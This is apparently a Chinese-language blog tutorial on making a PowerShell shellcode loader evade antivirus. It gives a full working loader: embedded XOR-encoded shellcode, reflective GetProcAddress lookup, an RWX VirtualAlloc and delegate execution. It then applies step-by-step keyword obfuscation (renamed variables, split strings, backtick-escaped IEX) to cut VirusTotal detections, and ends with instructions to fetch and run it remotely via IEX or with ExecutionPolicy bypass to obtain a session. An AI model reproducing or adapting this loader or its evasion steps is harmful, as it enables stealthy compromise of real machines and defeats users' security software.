payload生成

原生payload生成後被無情秒殺
powershell免殺制作
打開powershell指令行,将payload編碼
1.建立一個變量$h,用來接收之後轉換出的payload
2.把FromBase64String解碼得到的位元組陣列放入變量$k中
3.利用循環把每個位元組轉成十進制字串,每次在後面加個“,”,并且把資料拼接成一行
4.輸出轉換後的payload
整合為ps1腳本更方便
$h= ''
$k=[System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2Etx0dHR0dEsZdVqE3PbKpyMjI3gS6nJySSBycktzKCMjcHNLdKq85dz2yFN4EvFxSyMhY6dxcXFwcXNLyHYNGNz2quWg4HMS3HR0SdxwdUsOJTtY3Pam4yyn4CIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FeUEtzKsiIjI8rqIiMjy6jc3NwMYnZQcCPQBCEOnRtGWA9JPbgviut5qEtwnqLM1P/WSmYY5NZ+Ma6Y4+wqy6x8QlB6kAXrlVxdwM7y5/QSk93lTBKsMuOZBMABwpAHF6YvI35TQldKQU9GGANucGpmAxoNExgDdEpNR0xUUANtdwMVDRIYA3RsdBUXGAN3UUpHRk1XDBYNEwouKSMlEFzT6YeXw5abnZPfOiCfborrWnU/5BV7rollSoNrdYUP83wmPVcls5fvZykXV1cuZ/e2pk+A7+8bvQhRtiN+5fSMlld5T0oY5xRuqig/6FG2/MfQyb7Le75dhB+2LT1KZD3+zcVvXE0uTZza6YyXLzIx9Qoif5Po3wt1y9hGg6LydpPI6DLJC9REcSbIduXlWs3RlXJ7nGnP+69r3Uxc++P7iSHhLe0GHLELb1v03jRzRbOUfmLnGhepaXV7XmN8sHiWlWFM4Ak6V4XBlQ8V51f9d5wp0fwBfyNL05aBddz2SWNLIzMjI0sjI2MjdEt7h3DG3PawmiMjIyMi+nJwqsR0SyMDIyNwdUsxtarB3Pam41flqCQi4KbjVsZ74MuK3tzcEhMXDRERFg0SFhANERcbIzEXdVs=')
# Walk the byte array in $k and append each element to $h as decimal text followed by a comma.
$k | foreach {$h=$h+$_.ToString()+','}
# Emit the accumulated string. Every element, including the last, is followed by a comma,
# so the output ends with a trailing comma.
$h
然後将編碼得到的資料複制替換payload即可,注意去掉最後一個逗号“,”。
Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,220,220,220,12,98,118,80,112,35,208,4,33,14,157,27,70,88,15,73,61,184,47,138,235,121,168,75,112,158,162,204,212,255,214,74,102,24,228,214,126,49,174,152,227,236,42,203,172,124,66,80,122,144,5,235,149,92,93,192,206,242,231,244,18,147,221,229,76,18,172,50,227,153,4,192,1,194,144,7,23,166,47,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,26,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28
,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@
# Dispatch on the pointer size of the current process: [IntPtr]::size is 8 in a 64-bit process.
If ([IntPtr]::size -eq 8) {
# 64-bit host: pass the $DoIt text to a background job started with -RunAs32, evaluate it there
# with IEX (Invoke-Expression), then wait for the job and collect its output.
# NOTE(review): presumably done because the embedded byte array is 32-bit code; the page does not say so.
# For defenders, the Start-Job -RunAs32 plus IEX combination on a here-string is the observable pattern.
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
# Any other pointer size: evaluate the $DoIt text in the current process.
IEX $DoIt
}
火絨免殺
VT查殺率(60/13),還需要繼續改造
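修改關鍵字,規避靜态特征查殺,時間問題隻修改了小部分。這些改動隻改變腳本的文字,載入邏輯(反射取得GetProcAddress、用VirtualAlloc以0x3000/0x40申請内存、Marshal.Copy後調用委托)與原腳本相同,是以基于行為的檢測不受這些改名的影響。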
IEX $DoIt -- i`ex $DoIt
IEX $a -- ie`x $a
$var_runme -- $vrunme
$var_buffer -- $vbuffer
func_get_proc_address -- func_k
func_get_delegate_type -- func_l
$var_type_builder -- $vk
$var_parameters -- $vp
$var_return_type-- $ve
$var_procedure -- $v_pro
建議使用工具直接替換
到這裡,查殺率60/5,還需要再改改
最終payload
Set-StrictMode -Version 2
$DoIt = @'
function func_k {
Param ($var_module, $v_pro)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Mic'+'rosoft.Win32.Unsa'+'feNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetPro'+'cAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetM'+'oduleH'+'andle')).Invoke($null, @($var_module)))), $v_pro))
}
function func_l {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $vp,
[Parameter(Position = 1)] [Type] $ve = [Void]
)
$vk = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('Refle'+'ctedDele'+'gate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMem'+'oryModule', $false).DefineType('MyDelega'+'teType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$vk.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $vp).SetImplementationFlags('Runtime, Managed')
$vk.DefineMethod('Inv'+'oke', 'Public, HideBySig, NewSlot, Virtual', $ve, $vp).SetImplementationFlags('Runtime, Managed')
return $vk.CreateType()
}
[Byte[]]$var_code = [Byte[]](223,203,170,35,35,35,67,170,198,18,241,71,168,113,19,168,113,47,168,113,55,168,81,11,44,148,105,5,18,220,18,227,143,31,66,95,33,15,3,226,236,46,34,228,193,211,113,116,168,113,51,168,97,31,34,243,168,99,91,166,227,87,105,34,243,115,168,107,59,168,123,3,34,240,192,31,106,168,23,168,34,245,18,220,18,227,143,226,236,46,34,228,27,195,86,215,32,94,219,24,94,7,86,193,123,168,123,7,34,240,69,168,47,104,168,123,63,34,240,168,39,168,34,243,170,103,7,7,120,120,66,122,121,114,220,195,123,124,121,168,49,200,165,126,75,77,70,87,35,75,84,74,77,74,119,75,111,84,5,36,220,246,18,220,116,116,116,116,116,75,25,117,90,132,220,246,202,167,35,35,35,120,18,234,114,114,73,32,114,114,75,115,40,35,35,112,115,75,116,170,188,229,220,246,200,83,120,18,241,113,75,35,33,99,167,113,113,113,112,113,115,75,200,118,13,24,220,246,170,229,160,224,115,18,220,116,116,73,220,112,117,75,14,37,59,88,220,246,166,227,44,167,224,34,35,35,18,220,166,213,87,39,170,218,200,42,75,137,230,193,126,220,246,170,226,75,102,2,125,18,220,246,18,220,116,73,36,114,117,115,75,148,116,195,40,220,246,156,35,12,35,35,26,228,87,148,18,220,202,178,34,35,35,202,234,34,35,35,203,168,77,71,76,84,80,3,109,119,3,21,13,18,24,3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,22,13,19,10,46,41,35,37,16,92,211,233,135,151,195,150,155,157,147,223,58,32,159,110,138,235,90,117,63,228,21,123,174,137,101,74,131,107,117,133,15,243,124,38,61,87,37,179,151,239,103,41,23,87,87,46,103,247,182,166,79,128,239,239,27,189,8,81,182,35,126,229,244,140,150,87,121,79,74,24,231,20,110,170,40,63,232,81,182,252,199,208,201,190,203,123,190,93,132,31,182,45,61,74,100,61,254,205,197,111,92,77,46,77,156,218,233,140,151,47,50,49,245,10,34,127,147,232,223,11,117,203,216,70,131,162,242,118,147,200,232,50,201,11,212,68,113,38,200,118,229,229,90,205,209,149,114,123,156,105,207,251,175,107,221,76,92,251,227,251,137,33,225,45,237,6,28,177,11,111,91,244,222,52,115,69,179,148,126,98,231,26,23,169,105,117,123,94,99,124,176,120,150,149,97,76,224
,9,58,87,133,193,149,15,21,231,87,253,119,156,41,209,252,1,127,35,75,211,150,129,117,220,246,73,99,75,35,51,35,35,75,35,35,99,35,116,75,123,135,112,198,220,246,176,154,35,35,35,35,34,250,114,112,170,196,116,75,35,3,35,35,112,117,75,49,181,170,193,220,246,166,227,87,229,168,36,34,224,166,227,86,198,123,224,203,138,222,220,220,18,19,23,13,17,17,22,13,18,22,16,13,17,23,27,35,49,23,117,91)
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_k kernel32.dll VirtualAlloc), (func_l @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$vbuffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $vbuffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vbuffer, (func_l @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@
# Same dispatch as the first listing on this page: [IntPtr]::size is 8 in a 64-bit process.
If ([IntPtr]::size -eq 8) {
# 64-bit host: pass the $DoIt text to a background job started with -RunAs32, then wait for the job
# and collect its output.
# The page's substitution table lists ie`x as the replacement for IEX; the backtick is PowerShell's
# escape character inserted into the token.
# NOTE(review): detection content that matches the literal token IEX should normalize backticks
# before matching — confirm against the PowerShell versions in scope.
start-job { param($a) ie`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
# Any other pointer size: evaluate the $DoIt text in the current process.
# The page lists i`ex as the replacement for IEX here.
i`ex $DoIt
}
然後使用powershell遠端下載并通過IEX執行腳本得到會話權限
或者手動執行
c:\windows\system32\xx>d:
d:\>cd D:\wwwroot\xx\xxFile
D:\wwwroot\xx\xxFile>powershell -ExecutionPolicy bypass -File ./x.ps1
内容淺顯,沒什麼技術含量,不足之處歡迎師傅們指點和糾正,感激不盡。